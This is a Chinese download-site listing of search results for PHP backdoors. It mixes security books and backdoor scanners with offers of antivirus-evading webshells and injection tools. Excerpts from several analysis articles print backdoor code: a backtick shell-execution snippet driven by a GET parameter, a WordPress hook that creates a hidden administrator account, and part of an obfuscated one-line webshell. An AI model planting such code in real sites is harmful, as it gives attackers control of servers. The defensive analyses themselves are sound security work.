您好,欢迎光临本网站![请登录][注册会员]  

搜索资源列表

  1. php后门*扫面工具

  2. php扫描危险代码的程序 通过扫描文件发现一些危险函数
  3. 所属分类:PHP

    • 发布日期:2010-04-09
    • 文件大小:2kb
    • 提供者:myth1912
  1. 《PHP安全基础》

  2. 概述由于PHP语言在建立基于数据库驱动的动态网站所表现的高度灵活性,它已成为最流行的网站开发工具之一。它同时还可以与其它开源软件如MySql数据库和Apache服务器完美结合。但是,随着越来越多的网站使用PHP开发,它们也成为了恶意攻击者的目标,因此,开发者必须要做到应对攻击的准备。 随着攻击频度的增加,安全成为了一个需要关注的问题。《PHP安全基础》讲解了最常见的一些攻击方式,同时说明了如何编写不易被攻击的代码的方法。通过对各种攻击方法及应对技巧的试验,您会深入理解本书中所学到的各类安全措施
  3. 所属分类:PHP

    • 发布日期:2008-01-15
    • 文件大小:586kb
    • 提供者:lcq419
  1. HDSI3.0 ASP和PHP的注入工具

  2. 1、HDSI 3.0 内部使用版,支持asp,php的sql注入 2、“干净”意指无污染,去除弹站点和后门 3、“拓宽”意指把软件内藏的功能揪出来 注:其实后门也比较简单,就是把你攻陷的站点sql inject相关信息和管理页面发给教主.此版本我已分析代码,已完全去除后门相关,请大家放心使用.
  3. 所属分类:C#

    • 发布日期:2010-06-06
    • 文件大小:717kb
    • 提供者:l172025396
  1. 2012年最新*php后门,php*

  2. 2012年最新*php后门 *地球王 代码开源,为后门,过世界所有杀毒。
  3. 所属分类:PHP

    • 发布日期:2012-06-16
    • 文件大小:27kb
    • 提供者:w2632340
  1. php万能后门程序

  2. php万能后门操作类,放如任何php程序中即可使用!
  3. 所属分类:PHP

    • 发布日期:2012-09-11
    • 文件大小:10kb
    • 提供者:s89134006
  1. osbg PHP进销存系统

  2. 一. 使用条款 1. 亚雷(Yalei)进销存为开源软件项目, 用户可以自由的下载, 使用或修改本软件, 但未经授权不得非法转载, 以避免用户使用被非法修改或植入不安全代码的软件后造成严重后果. 2. 被授权转载的合作商, 必须提供官方网站原始的软件或代码下载, 不得擅自转载被第三方单位修改后的软件. 3. 本项目开源的目的是提供一个软件或产品供大家相互交流, 互相学习. 对使用本软件引起的任何问题及后果, 我们无须负法律责任. 4. 我们有不断完善, 修正软件以满足广大用户使用需求的社会责任
  3. 所属分类:PHP

    • 发布日期:2012-11-03
    • 文件大小:744kb
    • 提供者:regogogo
  1. php*扫描模仿安全狗

  2. php*扫描模仿安全狗,可以一键查找网站代码中的可疑语句及后门,站长的首选
  3. 所属分类:PHP

    • 发布日期:2014-04-23
    • 文件大小:5kb
    • 提供者:feilingfei
  1. PHP安全基础.chm

  2. PHP安全基础。 第一章,简介 本章提供了安全原则和一些好的经验。本章是本书其它章节的基础。 第二章,Form及URL 包括表单处理及攻击,如跨站脚本攻击及跨站请求欺骗。 第三章,数据库及SQL 数据库使用与攻击,如SQL注入 第四章,Session和Cookies 解释了PHP的session支持,同时展示了如何防止Session修改及Session劫持。 第五章,Includes 包括使用includes的风险,如后门URLs及代码注入 第六章,文件和命令 讨论如文件系统跨越及命令注入 第
  3. 所属分类:PHP

    • 发布日期:2008-10-16
    • 文件大小:586kb
    • 提供者:ganmu
  1. 2016年最新*大马,php过狗*(未加密升级版本)

  2. 本软件无毒无后门,明码未加密,代码一目了然! 本代码用于测试学习,请勿用于非法攻击! 下载后可以自己使用抓包软件测试! 批量挂马:输入自己的代码,就可以挂入站里所有文件 环境变量:测试服务器环境与服务器支持设置 在线代理:可以直接在WEBSHELL上代理连接其它网址 注册表操作:可直接操作注册表与查看3389端口 WEBSHELL:以各种权限运行CMD命令 杂项破解:可以破解各种密码! 解压mix.dll:某些命令操作需要mix.dll内带的函数 http文件下载:可以直接从你自己的网址下载文
  3. 所属分类:网络安全

  1. phpscan,php后门扫描神器

  2. phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
  3. 所属分类:PHP

    • 发布日期:2016-08-12
    • 文件大小:2mb
    • 提供者:iceblue0711
  1. PHP安全基础1-8章

  2. php安全基础[1-8章] 目录: 第一章:简介 1.1.PHP功能 1.1.1. 全局变量注册 1.1.2. 错误报告 1.2.原则 1.2.1. 深度防范 1.2.2. 最小权限 1.2.3. 简单就是美 1.2.4. 暴露最小化 1.3. 方法 1.3.1. 平衡风险与可用性 1.3.2. 跟踪数据 1.3.3. 过滤输入 1.3.4. 输出转义 第二章 表单及URL 2.1. 表单与数据 2.2. 语义URL攻击 2.3. 文件上传攻击 2.4. 跨站脚本攻击 2.5. 跨站请求伪造
  3. 所属分类:PHP

    • 发布日期:2008-12-19
    • 文件大小:290kb
    • 提供者:hongfeng8868
  1. 3个php后门WebShell*扫描神器

  2. 3个php后门WebShell*扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
  3. 所属分类:网络安全

    • 发布日期:2018-10-09
    • 文件大小:11kb
    • 提供者:xiangzhong1987
  1. 一个不易被发现的PHP后门代码解析

  2. 主要介绍了一个不易被发现的PHP后门代码解析,对于网络安全来说非常重要,需要的朋友可以参考下
  3. 所属分类:其它

    • 发布日期:2020-10-25
    • 文件大小:38kb
    • 提供者:weixin_38569219
  1. 一个不易被发现的PHP后门代码解析

  2. 偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。 伪装性很好,很容易被管理员忽略。 $selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; } 刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 而且又不是单引号,这个就是关键所
  3. 所属分类:其它

    • 发布日期:2020-12-18
    • 文件大小:43kb
    • 提供者:weixin_38687218
  1. PHP后门新玩法:一款猥琐的PHP后门分析

  2. 近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。Webshell代码如下:关键看下面这句代码,这里执行之后其实是一张图片,解密出来的图片地址如下:然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg
  3. 所属分类:其它

    • 发布日期:2021-03-04
    • 文件大小:704kb
    • 提供者:weixin_38736018
  1. PHP后门:PHP后门的集合。 仅用于教育或测试目的-源码

  2. PHP后门 PHP后门的集合。 仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与您的网络分开并在虚拟机中! 某些后门可能是后门的(是的,确实) 。 永远不要将其用于任何恶意目的。 后门遵循以下格式: Backdoorname_SHA1.php ,后门的名称是已知的。 PHP工具 这包括指向以下工具的链接: 反混淆器(在线和离线) 美化工具(在线和离线)
  3. 所属分类:其它

  1. PHP后门新玩法:一款猥琐的PHP后门分析

  2. 近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。Webshell代码如下:关键看下面这句代码,这里执行之后其实是一张图片,解密出来的图片地址如下:然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg
  3. 所属分类:其它

    • 发布日期:2021-01-30
    • 文件大小:704kb
    • 提供者:weixin_38586279
  1. php后门URL的防范

  2. 例如,下面WEB应用可能向登入用户显示敏感信息:复制代码 代码如下:由于sensitive.php位于网站主目录下,用浏览器能跳过验证机制直接访问到该文件。这是由于在网站主目录下的所有文件都有一个相应的URL地址。在某些情况下,这些脚本可能执行一个重要的操作,这就增大了风险。为了防止后门URL,你需要确认把所有包含文件保存在网站主目录以外。所有保存在网站主目录下的
  3. 所属分类:其它

    • 发布日期:2021-01-21
    • 文件大小:37kb
    • 提供者:weixin_38677808
  1. 防范wordpress主题加后门代码获取管理员权限

  2. 复制代码代码如下:add_action( ‘wp_head’, ‘my_backdoor’ );function my_backdoor() {if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {require( ‘wp-includes/registration.php’ );if ( !username_exists( ‘backdoor’ ) ) {$user_id = wp_create_user(
  3. 所属分类:其它

    • 发布日期:2021-01-20
    • 文件大小:29kb
    • 提供者:weixin_38499732
  1. 教你识别简单的免查杀PHP后门

  2. 一个最常见的一句话后门可能写作这样 或这样 tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php  $_++; // $_ = 1  $__=(“#”^”|”); // $__ = _   $__.=(“.”^”~”); // _P   $__.=(“/”^”`”); // _PO   $__.=(“|”^”/”); // _POS   $__.=(“{“^”/”); // _POST   ${$__}[!$_](
  3. 所属分类:其它

    • 发布日期:2021-01-20
    • 文件大小:73kb
    • 提供者:weixin_38748382
« 12 3 4 5 »